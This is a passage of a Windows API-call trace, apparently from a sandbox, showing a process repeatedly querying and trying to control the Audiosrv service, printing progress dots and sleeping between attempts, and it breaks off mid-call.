[0156.969] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0156.970] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0156.970] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0156.970] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0156.970] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0156.970] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0156.970] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0156.970] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120648 [0156.970] OpenServiceW (hSCManager=0x3120648, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120850 [0156.970] ControlService (in: hService=0x3120850, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x4, dwWaitHint=0x1388)) returned 0 [0156.970] GetLastError () returned 0x425 [0156.970] QueryServiceStatus (in: hService=0x3120850, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x4, dwWaitHint=0x1388)) returned 1 [0156.971] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118938 [0156.971] wcscpy_s (in: _Destination=0x3118954, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0156.971] CloseServiceHandle (hSCObject=0x3120648) returned 1 [0156.971] CloseServiceHandle (hSCObject=0x3120850) returned 1 [0156.971] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0156.971] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0156.972] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0156.972] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0156.972] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0156.972] NetApiBufferFree (Buffer=0x3118938) returned 0x0 [0156.972] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0156.972] GetFileType (hFile=0x90) returned 0x2 [0156.972] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0158.070] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0158.219] Sleep (dwMilliseconds=0x9c4) [0161.010] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0161.010] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0161.010] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0161.010] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0161.010] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0161.021] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0161.022] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0161.022] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120648 [0161.023] OpenServiceW (hSCManager=0x3120648, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120828 [0161.023] ControlService (in: hService=0x3120828, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x5, dwWaitHint=0x1388)) returned 0 [0161.023] GetLastError () returned 0x425 [0161.023] QueryServiceStatus (in: hService=0x3120828, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x5, dwWaitHint=0x1388)) returned 1 [0161.023] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118900 [0161.023] wcscpy_s (in: _Destination=0x311891c, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0161.023] CloseServiceHandle (hSCObject=0x3120648) returned 1 [0161.024] CloseServiceHandle (hSCObject=0x3120828) returned 1 [0161.024] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0161.024] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0161.025] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0161.025] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0161.025] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0161.025] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0161.025] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0161.025] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0161.025] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0161.025] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0161.025] NetApiBufferFree (Buffer=0x3118900) returned 0x0 [0161.025] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0161.025] GetFileType (hFile=0x90) returned 0x2 [0161.025] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0161.589] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0162.383] Sleep (dwMilliseconds=0x9c4) [0165.056] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0165.056] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0165.057] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0165.057] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120850 [0165.057] OpenServiceW (hSCManager=0x3120850, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x31205f8 [0165.057] ControlService (in: hService=0x31205f8, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x6, dwWaitHint=0x1388)) returned 0 [0165.058] GetLastError () returned 0x425 [0165.058] QueryServiceStatus (in: hService=0x31205f8, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x6, dwWaitHint=0x1388)) returned 1 [0165.058] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118890 [0165.058] wcscpy_s (in: _Destination=0x31188ac, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0165.058] CloseServiceHandle (hSCObject=0x3120850) returned 1 [0165.058] CloseServiceHandle (hSCObject=0x31205f8) returned 1 [0165.058] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0165.058] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0165.058] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0165.058] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0165.059] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0165.059] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0165.059] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0165.059] NetApiBufferFree (Buffer=0x3118890) returned 0x0 [0165.059] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0165.059] GetFileType (hFile=0x90) returned 0x2 [0165.060] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0165.504] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0165.814] Sleep (dwMilliseconds=0x9c4) [0168.729] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0168.787] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0168.787] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0168.787] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0168.787] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0168.787] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0168.787] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0168.788] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0168.788] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120968 [0168.789] OpenServiceW (hSCManager=0x3120968, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120878 [0168.789] ControlService (in: hService=0x3120878, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x6, dwWaitHint=0x1388)) returned 0 [0168.789] GetLastError () returned 0x425 [0168.789] QueryServiceStatus (in: hService=0x3120878, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x6, dwWaitHint=0x1388)) returned 1 [0168.790] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118778 [0168.790] wcscpy_s (in: _Destination=0x3118794, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0168.790] CloseServiceHandle (hSCObject=0x3120968) returned 1 [0168.790] CloseServiceHandle (hSCObject=0x3120878) returned 1 [0168.790] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0168.791] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0168.791] _wcsicmp (_String1="Audiosrv", 